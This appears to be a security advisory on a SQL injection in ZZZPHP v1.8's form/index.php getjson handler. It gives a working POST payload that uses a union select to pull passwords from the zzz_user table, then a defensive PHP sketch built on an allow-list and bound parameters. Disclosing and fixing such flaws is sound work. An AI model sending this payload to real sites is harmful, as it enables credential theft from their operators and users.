ZZZPHP v1.8 front-end SQL injection vulnerability



Vulnerability analysis 


Injection point: http://127.0.0.1/zzzphp/form/index.php?module=getjson
Send a POST request with the payload: table=gbook&where[]=1=1 union select password from zzz_user&col=1


Analysis:

In the file https://github.com/h4ckdepy/zzzphp/blob/master/form/index.php, line 262:
The get_json() method is dispatched through the getmodule() method when the value of the $act variable is getjson. This corresponds to a POST request to the URL http://127.0.0.1/zzzphp/form/index.php?module=getjson. The where parameter can be passed as an array to bypass the restriction, and no SQL injection filter is applied to the parameter, resulting in SQL injection.
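
A defensive sketch of how the table, col and where inputs could be validated and bound instead of concatenated, added here as an example and not taken from the ZZZPHP code base. The function name build_safe_query, the ALLOWED map and the gbook column names are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: table => columns a front-end caller may read or filter on.
// 'gbook' is the table named in the report; the column names are placeholders.
const ALLOWED = ['gbook' => ['id', 'title', 'content']];

// Build a parameterized SELECT from untrusted table/col/where input.
// Returns [sql, params]; throws on anything outside the allow-list.
function build_safe_query(array $input): array
{
    $table = $input['table'] ?? null;
    $col   = $input['col'] ?? null;
    $where = $input['where'] ?? [];

    if (!is_string($table) || !isset(ALLOWED[$table])) {
        throw new InvalidArgumentException('table not allowed');
    }
    if (!is_string($col) || !in_array($col, ALLOWED[$table], true)) {
        throw new InvalidArgumentException('column not allowed');
    }
    if (!is_array($where)) {
        throw new InvalidArgumentException('where must be a column => value map');
    }

    $clauses = [];
    $params  = [];
    foreach ($where as $field => $value) {
        // A list-style entry (where[]=...) arrives with an integer key: its value
        // would be a raw SQL fragment, not a column filter, so it is rejected.
        if (!is_string($field) || !in_array($field, ALLOWED[$table], true)) {
            throw new InvalidArgumentException('where key not allowed');
        }
        if (!is_scalar($value)) {
            throw new InvalidArgumentException('where value must be scalar');
        }
        $clauses[] = "`$field` = ?";   // identifier comes from the allow-list
        $params[]  = (string) $value;  // value is bound, never concatenated
    }

    $sql = "SELECT `$col` FROM `$table`";
    if ($clauses) {
        $sql .= ' WHERE ' . implode(' AND ', $clauses);
    }
    return [$sql, $params];
}

// Constructed input in the shape where[id]=7 (string key, scalar value).
[$sql, $params] = build_safe_query(['table' => 'gbook', 'col' => 'title', 'where' => ['id' => '7']]);
echo $sql, ' ', json_encode($params), PHP_EOL;
```

Execute the returned statement through a PDO prepared statement, `$pdo->prepare($sql)` followed by `execute($params)`, so that values never become part of the SQL text.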

